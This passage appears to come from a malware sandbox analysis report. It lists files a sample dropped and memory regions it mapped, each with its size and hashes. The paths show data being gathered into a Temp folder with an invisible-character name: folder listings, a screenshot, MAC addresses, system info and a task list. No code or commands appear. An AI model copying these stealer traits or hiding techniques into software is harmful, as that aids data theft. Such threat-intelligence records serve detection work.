57f7d5fd7905626726b9d7e45e5d596de5499015

SHA256
da1d72e59dc68c4bd9b609bfbe3b08fcef0dd4d7880be03a9b9d93e41e085d63

SHA512
558dbc7ec12071e711f67427323ae6113c79cec81a8cd7d89f4219416d66b16880d1990806eac1cb9ed9ef954324d13bdbbc1dd24b14bb0d91951919e729b52a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‏‏‎ \Directories\Music.txt

Filesize
555B

MD5
97bb5881d05592a583c8f65548f6b2cf

SHA1
1c655c3730427ab0588acc9740920ead6088399d

SHA256
08da36eae7dc3304f3e5c3a40ea430395670347354dda0540466f499ace812d6

SHA512
dd0de652ff9f1faa30a1f669d00b4c4237790cf0581a259921dc9fc0c4a3a85c5dfcfadbf8cb7d0b8ba327935e27f0a24a301425bc8eff746f6a76303b015569

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‏‏‎ \Directories\Pictures.txt

Filesize
881B

MD5
10867aa8effe137c0b572a93bc0910fd

SHA1
485f3403f47034b1e3f026c6822dca1e6cf495bc

SHA256
7d052e7e25ee33816f2070d127334db64c7a81a0c7c9f186db86a226d34a9cb0

SHA512
7577023fa1caa2318f3bd096540717c74e958e4e165876ffb420069c836d73de2cedbf971e62c63fd156aa0b4824ee94c22a8738f29f3a094e9be731e5ca59b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‏‏‎ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‏‏‎ \Display (1).png

Filesize
438KB

MD5
deedfe1bfd2002f6c346028106c8cc78

SHA1
d706c4e7bc1fb1f6438da71aa32fe9934d1541e5

SHA256
85a5a127959843fe46590fffc4a5f4b62395f4b13e3b5db14692b0ae73178d4a

SHA512
fbbd810b80d8b24c63e70edf47d95cc14e298acb90e500377971c4baea10e3c8af75c2f7e8f0391d5e882f449316c80465039e565ae3279066a822b3af729ab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‏‏‎ \System\MAC Addresses.txt

Filesize
232B

MD5
94674ec67695df934e9929f3c4ffe566

SHA1
7d99d56ed171db5d1c229b387fd6745d47f8a02d

SHA256
826659943d7f3134e559e1c5b6a503267253b8dd2c5a23d147367c1d7b548994

SHA512
0a0029bfb43bcfa4b3fb8e102b645e4a41fa7dbf84928e00c958658dcbe9b92f48ec7defe2f45ea0eec172b43e12c18fd006c1680feb65f3a28eb7c9575492ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‏‏‎ \System\System Info.txt

Filesize
2KB

MD5
fe206088b21d66f20af665dbd2edb5a4

SHA1
f1e891546b134f88509531534abef18efcf025e2

SHA256
743753b089aabbcd638fc0ce90ec8085e09fb14c9f931dc0c02193981037dbbf

SHA512
4d3e170970828d7032d0c4abd51472e3d8b77ad066e5581e1768feb5de4103c9f719d6382b74d0bf90e68dd98d275fe7288f999f821a1d4c959da433899ffd45

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‏‏‎ \System\Task List.txt

Filesize
12KB

MD5
b5c72b5c332799ba1ee90452305296fd

SHA1
313fc1e6d1ce4fad7b478d2d53a918e6e6fb0909

SHA256
c94e9ae03fd544a186df7725ae7d477084daf69dfd1094e4e33f0db1c7cb8764

SHA512
9f694ca8e5c2a42b33f8c2879ec5df09ee6424b0e2f6f3495e880845d8a769429dada52764ecaa8eaece97d24c32269727585c6d482242fb9041d9c83e164619

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\faqex0ze\CSC6C1C7E17AA264F568BD8D3FD988D16.TMP

Filesize
652B

MD5
746aee80a20561c38fd082ec2057e53d

SHA1
aced30f5c20c59232e96797b1638ec38f6aa1ade

SHA256
83a5a4140f55d587a2c6a28d58b3f92e6e34f0787dfbbcb546d9a8975f7b31ee

SHA512
9a55ba9134eae745d002958c5cdc6f886079dc00a957b707ab16cbb8981dfa8d6743cbb5c82c8a5676dd8ef70812535d8ecf368e6d5a50a84b22c8e8b7e34c6b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\faqex0ze\faqex0ze.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\faqex0ze\faqex0ze.cmdline

Filesize
607B

MD5
e5c1b491e1c56be55740f3c19259f3ff

SHA1
c23b40aa29f4f34bcdb1fd5f503606434685364f

SHA256
816296738e32e70ae2f425f2d6010aa7c76c5682398c0f9def9393372b01ce65

SHA512
d4a41759cb98500b9ea5315817682c2a397ff3a9e291513d81ce0aae47238a58c9c76538c595496e5b3fcb8c5ba2131e730eb2835f5d880a99674bf1781bc642

Download Submit
memory/1996-83-0x00007FFB0ABB3000-0x00007FFB0ABB5000-memory.dmp

Filesize
8KB

Download
memory/1996-85-0x00007FFB0ABB0000-0x00007FFB0B671000-memory.dmp

Filesize
10.8MB

Download
memory/1996-86-0x00007FFB0ABB0000-0x00007FFB0B671000-memory.dmp

Filesize
10.8MB

Download
memory/1996-96-0x000001D4FF990000-0x000001D4FF9B2000-memory.dmp

Filesize
136KB

Download
memory/1996-140-0x00007FFB0ABB0000-0x00007FFB0B671000-memory.dmp

Filesize
10.8MB

Download
memory/3440-62-0x00007FFB1C470000-0x00007FFB1C489000-memory.dmp

Filesize
100KB

Download
memory/3440-30-0x00007FFB1CB30000-0x00007FFB1CB55000-memory.dmp

Filesize
148KB

Download
memory/3440-78-0x00007FFB1BC50000-0x00007FFB1BC5D000-memory.dmp

Filesize
52KB

Download
memory/3440-80-0x00007FFB1CC20000-0x00007FFB1CC3A000-memory.dmp

Filesize
104KB

Download
memory/3440-70-0x00007FFB0C750000-0x00007FFB0CE14000-memory.dmp

Filesize
6.8MB

Download
memory/3440-81-0x00007FFB0B730000-0x00007FFB0B84B000-memory.dmp

Filesize
1.1MB

Download
memory/3440-71-0x00007FFB0BED0000-0x00007FFB0BF9D000-memory.dmp

Filesize
820KB

Download
memory/3440-25-0x00007FFB0C750000-0x00007FFB0CE14000-memory.dmp

Filesize
6.8MB

Download
memory/3440-146-0x00007FFB132A0000-0x00007FFB132D3000-memory.dmp

Filesize
204KB

Download
memory/3440-74-0x00007FFB1CB30000-0x00007FFB1CB55000-memory.dmp

Filesize
148KB

Download
memory/3440-197-0x00007FFB0BED0000-0x00007FFB0BF9D000-memory.dmp

Filesize
820KB

Download
memory/3440-198-0x0000021AE4CD0000-0x0000021AE51F9000-memory.dmp

Filesize
5.2MB

Download
memory/3440-200-0x00007FFB0B9A0000-0x00007FFB0BEC9000-memory.dmp

Filesize
5.2MB

Download
memory/3440-72-0x0000021AE4CD0000-0x0000021AE51F9000-memory.dmp

Filesize
5.2MB

Download
memory/3440-73-0x00007FFB0B9A0000-0x00007FFB0BEC9000-memory.dmp

Filesize
5.2MB

Download
memory/3440-66-0x00007FFB132A0000-0x00007FFB132D3000-memory.dmp

Filesize
204KB

Download
memory/3440-64-0x00007FFB1C420000-0x00007FFB1C42D000-memory.dmp

Filesize
52KB

Download
memory/3440-82-0x00007FFB1C490000-0x00007FFB1C4B4000-memory.dmp

Filesize
144KB

Download
memory/3440-60-0x00007FFB0C5D0000-0x00007FFB0C74F000-memory.dmp

Filesize
1.5MB

Download
memory/3440-58-0x00007FFB1C490000-0x00007FFB1C4B4000-memory.dmp

Filesize
144KB

Download
memory/3440-84-0x00007FFB0C5D0000-0x00007FFB0C74F000-memory.dmp

Filesize
1.5MB

Download
memory/3440-56-0x00007FFB1CC20000-0x00007FFB1CC3A000-memory.dmp

Filesize
104KB

Download
memory/3440-54-0x00007FFB1C500000-0x00007FFB1C52D000-memory.dmp

Filesize
180KB

Download
memory/3440-77-0x00007FFB13280000-0x00007FFB13294000-memory.dmp

Filesize
80KB

Download
memory/3440-40-0x00007FFB21710000-0x00007FFB2171F000-memory.dmp

Filesize
60KB

Download
memory/3440-239-0x00007FFB1CB30000-0x00007FFB1CB55000-memory.dmp

Filesize
148KB

Download
memory/3440-244-0x00007FFB0C5D0000-0x00007FFB0C74F000-memory.dmp

Filesize
1.5MB

Download
memory/3440-238-0x00007FFB0C750000-0x00007FFB0CE14000-memory.dmp

Filesize
6.8MB

Download
memory/3440-237-0x00007FFB0B730000-0x00007FFB0B84B000-memory.dmp

Filesize
1.1MB

Download
memory/3440-265-0x00007FFB13280000-0x00007FFB13294000-memory.dmp

Filesize
80KB

Download
memory/3440-277-0x00007FFB132A0000-0x00007FFB132D3000-memory.dmp

Filesize
204KB

Download
memory/3440-276-0x00007FFB1C420000-0x00007FFB1C42D000-memory.dmp

Filesize
52KB

Download
memory/3440-275-0x00007FFB1C470000-0x00007FFB1C489000-memory.dmp

Filesize
100KB

Download
memory/3440-274-0x00007FFB0C5D0000-0x00007FFB0C74F000-memory.dmp

Filesize
1.5MB

Download
memory/3440-273-0x00007FFB1C490000-0x00007FFB1C4B4000-memory.dmp

Filesize
144KB

Download
memory/3440-272-0x00007FFB1CC20000-0x00007FFB1CC3A000-memory.dmp

Filesize
104KB

Download
memory/3440-271-0x00007FFB1C500000-0x00007FFB1C52D000-memory.dmp

Filesize
180KB

Download
memory/3440-270-0x00007FFB21710000-0x00007FFB2171F000-memory.dmp

Filesize
60KB

Download
memory/3440-269-0x00007FFB1CB30000-0x00007FFB1CB55000-memory.dmp

Filesize
148KB

Download
memory/3440-268-0x00007FFB0B9A0000-0x00007FFB0BEC9000-memory.dmp

Filesize
5.2MB

Download
memory/3440-263-0x00007FFB0BED0000-0x00007FFB0BF9D000-memory.dmp

Filesize
820KB

Download
memory/3440-253-0x00007FFB0C750000-0x00007FFB0CE14000-memory.dmp

Filesize
6.8MB

Download
memory/3440-267-0x00007FFB0B730000-0x00007FFB0B84B000-memory.dmp

Filesize
1.1MB

Download
memory/3440-266-0x00007FFB1BC50000-0x00007FFB1BC5D000-memory.dmp

Filesize
52KB

Download
memory/5760-144-0x000001F24D2E0000-0x000001F24D2E8000-memory.dmp

Filesize
32KB

Download